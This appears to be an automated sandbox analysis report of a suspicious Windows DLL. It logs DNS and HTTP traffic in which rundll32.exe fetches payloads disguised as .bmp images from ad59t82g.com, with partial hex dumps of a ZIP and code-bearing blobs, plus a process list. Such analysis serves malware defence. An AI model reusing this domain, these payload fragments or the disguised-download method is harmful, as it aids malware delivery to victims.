                                    Dec 27, 2024 06:22:18.721302032 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:18.721308947 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:18.767735958 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:19.768471003 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:19.887940884 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.245400906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.246222973 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:20.365758896 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.584721088 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.584830046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.584999084 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:20.585001945 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:20.627127886 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:41.847944021 CET4973080192.168.2.4104.21.22.88
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 06:22:09.523690939 CET5819753192.168.2.41.1.1.1
                                    Dec 27, 2024 06:22:09.800762892 CET53581971.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 27, 2024 06:22:09.523690939 CET192.168.2.41.1.1.10x968eStandard query (0)ad59t82g.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 27, 2024 06:22:09.800762892 CET1.1.1.1192.168.2.40x968eNo error (0)ad59t82g.com104.21.22.88A (IP address)IN (0x0001)false
                                    Dec 27, 2024 06:22:09.800762892 CET1.1.1.1192.168.2.40x968eNo error (0)ad59t82g.com172.67.203.195A (IP address)IN (0x0001)false
                                    • ad59t82g.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730104.21.22.88807676C:\Windows\SysWOW64\rundll32.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 27, 2024 06:22:10.077848911 CET116OUTHEAD /2/text.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:11.345278025 CET878INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:11 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 231953
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 16:12:10 GMT
                                    ETag: "6719205a-38a11"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIDjEX5Dt5WJL8W%2FFwwOrlFh0nf3OdpckvV65IMEkhVovMdwHCAOkJMLBBtzNmHh7I1SMYLHsHMLwTSpD76nG4dxUh2NfDYxJW0KbwzoOwMCsUfb00qTEVp0vffNfRI%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df12db577d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=116&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Dec 27, 2024 06:22:11.347697020 CET115OUTGET /2/text.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:11.681175947 CET1236INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:11 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 231953
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 16:12:10 GMT
                                    ETag: "6719205a-38a11"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: HIT
                                    Age: 0
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4k3nOfnwtLHAW7byKbv%2FDEHg%2FJ%2BEJ%2BcD3bC2FZEFC9GSTV5VZu4w0pKv98BwUfNgSja1ACfRYVGwMnoiB1GUYWzufAtJPxCHsB5zNzvYpjytsvWJ2bvNT5%2Bfl5FsCM%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df15fe557d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=4162&min_rtt=1971&rtt_var=5122&sent=3&recv=5&lost=0&retrans=0&sent_bytes=878&recv_bytes=231&delivery_rate=74864&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 96 01 58 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 db 90 19 67 db 90 19 67 db 90 19 67 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 2c 20 19 67 2b 56 ec 66 35 4f c3 bc f1 a4 c9 bd bc 14 31 c4 75 15 bd d3 c2 29 19 ce 46 a8 0f 81 13 8a 36 76 a0 c2 69 4e 21 8d fd af 43 4d 7d 85 2f fe b7 d9 51 87 b4 70 3f cc fe df 07 83 b0 14 fb 19 76 09 f7 fd 17 5a cf 66 a2 68 ea fc 06 45 d9 8a fc 4b 22 55 b9 07 6b 4e 37 ca 74 20 84 7b f1 5a 03 94 5c 32 dc bb 83 8f db 28 72 e6 a5 5f ec 88 20 42 62 fd f2 54 09 93 bb 9e 0f 9d 99 3d 0d e5 f2 d4 c8 c2 d6 bb de a9 99 88 7d d1 da fb 78 82 3c b4 34 11 96 11 3d 77 ee a9 56 71 c3 c7 43 4e fe a2 03 14 94 ca dd 32 11 87 06 80 6b 76 93 80 bf 83 58 1d 72 37 60 b9 1d 0c b1 ca c8 da f5 33 92 a9 f9 e6 d9 ac 62 c8 11 ee 6b 1c 1d 72 e8 f1 b4 73 95 e8 7b 7b 90 aa 4f da 00 c3 3b 3c 86 5d 85 f0
                                    Data Ascii: PKXYtext/UTgggPK7Xxtext/MSVCP140.dllUTe, g+Vf5O1u)F6viN!CM}/Qp?vZfhEK"UkN7t {Z\2(r_ BbT=}x<4=wVqCN2kvXr7`3bkrs{{O;<]
                                    Dec 27, 2024 06:22:11.681236982 CET1236INData Raw: 21 55 7b c2 6f e5 e7 00 91 b3 75 4a 42 86 87 b4 fc c2 bd d9 0e 37 19 b6 b6 1d 5e 29 41 f0 a4 fa 3b df 22 16 31 3e 1c 35 da de 77 f6 1f b2 0d 7b 20 3e 36 5a 0f 3e bc 08 07 e5 bf 85 09 d6 7a 63 71 5a a8 45 f3 92 1a 86 ed b3 1a 13 9a 80 58 70 c0 89
                                    Data Ascii: !U{ouJB7^)A;"1>5w{ >6Z>zcqZEXp)d.%fn#\6Q%ZM0>>y,dmj(iA?'Oi:9)uR%]~?gIFNj5xjHJD{6"_9y}8mN{H=ihq~>Q
                                    Dec 27, 2024 06:22:11.681274891 CET1236INData Raw: f4 c9 30 a0 30 cb db 44 3e c8 4c 78 d5 56 52 28 f8 f7 b1 f6 8f 7e 0a 86 30 54 a7 0b f1 e5 cf e8 64 0b e5 66 bb a7 cb ca f5 0e d1 c2 b8 ab d2 f7 de 8a 17 1b 85 51 10 1c 89 3d 98 9c b6 45 87 cb 07 be de a8 82 2e 52 e8 e9 23 97 86 e8 57 68 ea 59 72
                                    Data Ascii: 00D>LxVR(~0TdfQ=E.R#WhYrL@x%~8;Sl~F&NYEtPP!T1AlOgjX^J'VAl$;}}{wp^5m#B0j3+DE7R aYd5D0M=^l&/
                                    Dec 27, 2024 06:22:11.681314945 CET1236INData Raw: b8 34 81 30 a0 e2 5f 9f 06 ef a3 cf fa bd b4 d1 78 1d e7 af 7c fd cf bb a3 ef 4d 5b fe 49 dd 24 36 a2 41 59 e2 72 1b 1d 41 13 38 43 e4 22 0b fa 4b bb 19 67 82 0a b4 b0 e1 a5 4b fd 9c c8 a2 ff e5 37 a9 0f e6 a4 30 6a f8 a5 5b a3 aa f6 13 b9 97 f7
                                    Data Ascii: 40_x|M[I$6AYrA8C"KgK70j[}5`(AG[R/IAX8unaj#(a*u`/*6c YJQh@UAx<zF?Eo)}v >vhn%Y+jB9CN,|({R9M|[lX:"
                                    Dec 27, 2024 06:22:11.681384087 CET1236INData Raw: 53 19 43 1d 23 da 6d ee 7b 0f b8 a2 fa c0 3e 9c e3 62 a4 8d 2c b7 ee b1 3c 22 2d 27 04 9c cb fd c1 be df d9 45 90 ff d5 9f f5 85 64 5e b7 95 05 06 f6 df 1f ff e5 88 b7 eb fc d3 cd 1b 04 0b 16 e8 ba 74 0a f3 0f 2b c7 ce dd 22 28 1c ef 0b f5 46 10
                                    Data Ascii: SC#m{>b,<"-'Ed^t+"(FDDzaOP<Y|e sB-8|!'/{DIM^2{;SC[,]D@{>&i+~BJ%,W^=|,Nor_xM[+$6^KjZCO,6~(
                                    Dec 27, 2024 06:22:11.681421041 CET1120INData Raw: 9c de 19 c6 23 69 3c b2 2e 00 84 62 de 64 90 6d fb e5 9c 2c 74 3a 56 e0 8e 51 57 3d 61 67 67 68 da ff 49 d2 0f 9e a8 f9 85 13 2f e2 38 03 c3 36 ef 27 f5 8f ba 99 a1 f2 28 82 19 11 5d 6b 4b 4a 6f b3 c2 05 9d 49 42 a8 fd 3b 6a 78 4b e2 0b e6 14 ae
                                    Data Ascii: #i<.bdm,t:VQW=agghI/86'(]kKJoIB;jxKPFw<ke/Gxb%.$/}LM[A7gRKh;@'lv"1at@sjC`U{ R/JJ*YO Iq_)]<\\H4y`MN
                                    Dec 27, 2024 06:22:11.681454897 CET1236INData Raw: e9 2f 45 bf 94 0c 8d 4c 55 ef e3 1b 9a 76 ed 58 cc 4b d6 99 ca bb 9b 9a 24 8f 6c b9 fd 84 18 06 3d 5d f3 41 85 c5 35 85 01 22 bd 3a d2 f0 3e f9 f8 60 2f 83 e2 66 52 a6 ab b5 01 2c 6b 32 22 08 1c 2e cb c8 5d ef d2 ef e1 92 df be 88 3d 49 48 2e 17
                                    Data Ascii: /ELUvXK$l=]A5":>`/fR,k2".]=IH.d_t)vjmz;SRU;V=>C$;oLFK6%8L$Ii o]Y!oM`{m=Tfghy_=EN:6]
                                    Dec 27, 2024 06:22:11.681489944 CET1236INData Raw: 9a e6 4e d7 c6 ad b1 23 13 62 8a d3 d4 d4 a2 3a df 34 79 4a 42 f7 51 15 72 5d 64 b5 78 79 d4 1e 77 48 1d 4c 96 23 b6 6e 88 3d 92 9f 84 18 4a a7 dc 75 15 cd 5d 75 fd 32 75 45 7a c5 8a 64 3a 79 de 9e e8 da 7b 01 70 6f c0 8f eb 65 d1 d2 30 4e ae 03
                                    Data Ascii: N#b:4yJBQr]dxywHL#n=Ju]u2uEzd:y{poe0N)p`ep HSbJ]<hs+c6}u?=S--ACWZCv5)W5W~2CPO2\&a*xp3B5I/
                                    Dec 27, 2024 06:22:11.681710005 CET1236INData Raw: 78 52 ca f7 3a 19 af 55 da 4b 8d 3f 1b de d9 8d c9 bc 1a 81 d2 39 5d 55 41 09 2a de 84 1a 1b c3 ad ec 07 96 ed 6e ae b8 31 2e a4 c5 05 30 9e 9a 30 67 cd af 65 26 ed e5 ce 04 d3 80 85 57 22 2f c2 a0 b1 c0 6b 44 ff dc 42 6a 70 ce 80 e4 28 b5 da 2d
                                    Data Ascii: xR:UK?9]UA*n1.00ge&W"/kDBjp(-eW%5/L_D.]?QR#B+87V\7~>$}ph3W@(Bl-!;8^c_R3;sx[}m]blvEKUq=XlnTX
                                    Dec 27, 2024 06:22:11.681761980 CET1236INData Raw: 70 fd 82 a1 cc ad 45 13 05 80 e9 67 bc e9 01 9f ca 0d ce 7a e2 5d 4b d6 41 74 0b 61 88 69 61 96 f7 b7 1c 51 9f ca 8f 86 32 75 d6 34 75 05 81 bd b7 76 c2 f9 b8 37 f8 89 7f 56 02 66 5f 82 d2 81 8c d5 af 65 78 5f a1 02 94 0b 4c 0b 4b 0d 5f 5b f1 c1
                                    Data Ascii: pEgz]KAtaiaQ2u4uv7Vf_ex_LK_[ "S?|uKV8gf<}C.of#Zj^?5WOBz62iLB.ei>aSuJ#j_nRN|
                                    Dec 27, 2024 06:22:11.689654112 CET1236INData Raw: 73 2a c0 d6 e8 92 77 06 12 c5 40 37 39 38 24 ae e9 da a2 87 45 0b 9a b1 b9 c4 42 15 8e c5 0e 66 9b 51 26 ea b5 72 75 f8 a0 a2 ee b2 57 d8 c4 ca c7 b6 0a e5 cd 94 eb 5e 77 94 46 60 10 d2 e7 3e 9d d0 5a f7 07 d4 01 91 fe b4 cf 95 45 52 1f 44 68 95
                                    Data Ascii: s*w@798$EBfQ&ruW^wF`>ZERDhD8$}%"G_9B=Hp^bz>A3p86(V9Y?JVmXb?vmLQ/3.~R,OC{^S(3%9nCVtIzw
                                    Dec 27, 2024 06:22:13.595421076 CET113OUTHEAD /2/d.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:14.077255011 CET907INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:13 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 1236598
                                    Connection: keep-alive
                                    Last-Modified: Sun, 27 Oct 2024 15:21:40 GMT
                                    ETag: "671e5a84-12de76"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpjKIMq5riD6k9fp%2FWuJhf8dBGPyvIB44Bi7ED1NVPM6DeR6j23Wrc6PJz5%2Bbg3XcnR4x6V4IlDJmcAV%2F5TzTOC0yi1J%2FjUA68nDwofgVL%2FBj674fIS0EaRBhiT%2BI%2FY%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df240af77d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=3324&min_rtt=1971&rtt_var=455&sent=164&recv=19&lost=0&retrans=0&sent_bytes=233731&recv_bytes=344&delivery_rate=59184190&cwnd=336&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Dec 27, 2024 06:22:14.078093052 CET112OUTGET /2/d.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:14.432019949 CET1236INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:14 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 1236598
                                    Connection: keep-alive
                                    Last-Modified: Sun, 27 Oct 2024 15:21:40 GMT
                                    ETag: "671e5a84-12de76"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: HIT
                                    Age: 1
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlBfSf2uqIyXpFIU6zDxYbVddpl4qUiiMYdwA%2BhL3AxBX3cHw5iC%2BkxZot%2FT0n%2FSnb1yQwg0YjXb7KtnacLPSJO0dCAblq3Hll1q%2Btx2%2Fy1qrAd6Mw5qkKhQiBniklk%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df272e337d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=5633&min_rtt=1971&rtt_var=4960&sent=166&recv=21&lost=0&retrans=0&sent_bytes=234638&recv_bytes=456&delivery_rate=59184190&cwnd=337&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 09 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 34 c5 41 de 55 ab 12 de 55 ab 12 de 55 ab 12 b1 23 35 12 ea 55 ab 12 b1 23 01 12 46 55 ab 12 b1 23 00 12 f1 55 ab 12 d7 2d 28 12 dd 55 ab 12 d7 2d 38 12 cf 55 ab 12 de 55 aa 12 01 55 ab 12 b1 23 04 12 ff 55 ab 12 b1 23 30 12 df 55 ab 12 b1 23 31 12 df 55 ab 12 b1 23 36 12 df 55 ab 12 35 61 63 68 de 55 ab 12 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 04 52 1e 67 67
                                    Data Ascii: BMv6(,, @*Rdcg'gggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICg4AUUU#5U#FU#U-(U-8UUU#U#0U#1U#6U5achUgggggg7M+Rgg
                                    Dec 27, 2024 06:22:17.907387972 CET114OUTHEAD /2/t1.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:18.388911963 CET897INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:18 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 2487
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 17:31:56 GMT
                                    ETag: "6719330c-9b7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pr0pquQUpOfd8Q86NPXE4SHC4EcDtoaO2EJVCfBhKUHvEr%2Bs9aE5X7Rrtp0YG2eKb9UPk5q2b%2BN5VcyB2WcxNqatOERw%2FV8iloR7LM0tNKQ2CtH6D0KzyDMybXLCnwk%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df3efb967d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=10003&min_rtt=1971&rtt_var=4184&sent=1026&recv=93&lost=0&retrans=1&sent_bytes=1472796&recv_bytes=570&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Dec 27, 2024 06:22:18.389417887 CET113OUTGET /2/t1.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:18.721013069 CET1236INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:18 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 2487
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 17:31:56 GMT
                                    ETag: "6719330c-9b7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: HIT
                                    Age: 0
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2RY3LEtlhMsLqnD%2Bm5elawtfok20aUJgWzzi0L%2Bc%2F5yhJ%2FC%2B5FHC14Tq0Jc6239GfAelZgzQJUz%2FtzGrsrFw6aLo9QaEIq3RdvLXchaNXSPC5ZD1jtNnNTpI37jQqQ%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df41fa3d7d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=11591&min_rtt=1971&rtt_var=6314&sent=1028&recv=95&lost=0&retrans=1&sent_bytes=1473693&recv_bytes=683&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8
                                    Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8
                                    Dec 27, 2024 06:22:19.768471003 CET114OUTHEAD /2/t6.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:20.245400906 CET899INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:20 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 2487
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 16:10:24 GMT
                                    ETag: "67191ff0-9b7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5Jhi09HSIe3i%2Fpx6OJlMX6mwITGAMypm5%2Fmvp4s52rRZ0S3y0i9YEZzjmZQxM8VL4FK1m%2BSi2GxgtraGSN0%2FcWzvYeXB5h6LMztJ9aQLxVqflUqPuTdMgjRdmk9Qws%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df4a9a427d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=10407&min_rtt=1971&rtt_var=6413&sent=1032&recv=98&lost=0&retrans=1&sent_bytes=1477090&recv_bytes=797&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Dec 27, 2024 06:22:20.246222973 CET113OUTGET /2/t6.bmp HTTP/1.1
                                    Cache-Control: no-cache
                                    Connection: Keep-Alive
                                    Pragma: no-cache
                                    Host: ad59t82g.com
                                    Dec 27, 2024 06:22:20.584721088 CET1236INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 05:22:20 GMT
                                    Content-Type: image/x-ms-bmp
                                    Content-Length: 2487
                                    Connection: keep-alive
                                    Last-Modified: Wed, 23 Oct 2024 16:10:24 GMT
                                    ETag: "67191ff0-9b7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: HIT
                                    Age: 0
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtFuiP7vdGoCMioEMJ8i9uVNcFTtzAs%2BXvYxR53nl5ljie3OS4ZiTAoh8vZPo2jvjnAOaCz32kpy7h2%2FwAd6L7TQDNJ6TZyCbmrixeMojz8vJxz4Xug1mmCGTLzd8%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f86df4d9d957d1e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=12302&min_rtt=1971&rtt_var=8599&sent=1034&recv=100&lost=0&retrans=1&sent_bytes=1477989&recv_bytes=910&delivery_rate=79718081&cwnd=457&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 4e 0e 00 00 54
                                    Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8NT


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:00:21:57
                                    Start date:27/12/2024
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll"
                                    Imagebase:0x6e0000
                                    File size:126'464 bytes
                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:1
                                    Start time:00:21:57
                                    Start date:27/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:2
                                    Start time:00:21:57
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

